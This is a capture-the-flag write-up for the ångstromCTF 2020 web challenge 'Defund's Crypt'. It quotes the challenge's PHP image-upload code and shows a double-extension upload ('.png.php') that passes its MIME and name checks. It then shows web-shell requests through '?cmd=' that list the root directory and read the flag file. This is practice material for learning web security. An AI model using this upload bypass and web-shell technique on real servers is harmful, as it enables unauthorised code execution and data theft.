# ▼▼▼Defund's Crypt(Web、120pts、304/1596=19.0％)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

`https://crypt.2020.chall.actf.co/src.php`

↓

```

<html>  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width,initial-scale=1">  
<link
href="https://fonts.googleapis.com/css?family=Inconsolata|Special+Elite&display=swap"
rel="stylesheet">  
<link rel="stylesheet" href="/style.css">  
<title>Defund's Crypt</title>  
</head>  
<body>  
  
  
<h1>Defund's Crypt<span>o</span></h1>  
1000000) {  
throw new RuntimeException('People can only remember so much..');  
}  
$finfo = new finfo(FILEINFO_MIME_TYPE);  
if (false === $ext = array_search(  
$finfo->file($_FILES['imgfile']['tmp_name']),  
array(  
'.jpg' => 'image/jpeg',  
'.png' => 'image/png',  
'.bmp' => 'image/bmp',  
),  
true  
)) {  
throw new RuntimeException("Your memory isn't picturesque enough to be
remembered.");  
}  
if (strpos($_FILES["imgfile"]["name"], $ext) === false) {  
throw new RuntimeException("The name of your memory doesn't seem to match its
content.");  
}  
$bname = basename($_FILES["imgfile"]["name"]);  
$fname = sprintf("%s%s", sha1_file($_FILES["imgfile"]["tmp_name"]),
substr($bname, strpos($bname, ".")));  
if (!move_uploaded_file(  
$_FILES['imgfile']['tmp_name'],  
"./memories/" . $fname  
)) {  
throw new RuntimeException('Your memory failed to be remembered.');  
}  
http_response_code(301);  
header("Location: /memories/" . $fname);  
} catch (RuntimeException $e) {  
echo "

" . $e->getMessage() . "

";  
}  
}  
?>  
![](crypt.jpg)  
<form method="POST" action="/" autocomplete="off" spellcheck="false"
enctype="multipart/form-data">  

Leave a memory:

  
<input type="file" id="imgfile" name="imgfile">  
<label for="imgfile" id="imglbl">Choose an image...</label>  
<input type="submit" value="Descend">  
</form>  
<script>  
imgfile.oninput = _ => {  
imgfile.classList.add("satisfied");  
imglbl.innerText = imgfile.files[0].name;  
};  
</script>  
</body>  
</html>  
```

↓

```  
if (false === $ext = array_search(  
$finfo->file($_FILES['imgfile']['tmp_name']),  
array(  
'.jpg' => 'image/jpeg',  
'.png' => 'image/png',  
'.bmp' => 'image/bmp',  
),  
true  
)) {  
throw new RuntimeException("Your memory isn't picturesque enough to be
remembered.");  
}  
if (strpos($_FILES["imgfile"]["name"], $ext) === false) {

throw new RuntimeException("The name of your memory doesn't seem to match its
content.");  
}  
```

↓

In order to pass this path, for example, `MMEType may be set to png` and `the
same extension name png` may be present in the file name.

↓

```  
POST / HTTP/1.1  
Host: crypt.2020.chall.actf.co  
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryrDvxOBjItkRppQlH  
Content-Length: 234

\------WebKitFormBoundaryrDvxOBjItkRppQlH  
Content-Disposition: form-data; name="imgfile";
filename="hacker_white1.png.php"  
Content-Type: image/png

?PNG

\------WebKitFormBoundaryrDvxOBjItkRppQlH--  
```

↓

```  
Location: /memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php  
```

\---

`https://crypt.2020.chall.actf.co/memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php?cmd=ls%20/`

↓

```  
?PNG ? bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run
sbin srv sys tmp usr var  
```

\---

`https://crypt.2020.chall.actf.co/memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php?cmd=cat%20/flag.txt`

↓

`{actf{th3_ch4ll3ng3_h4s_f4ll3n_but_th3_crypt_rem4ins}`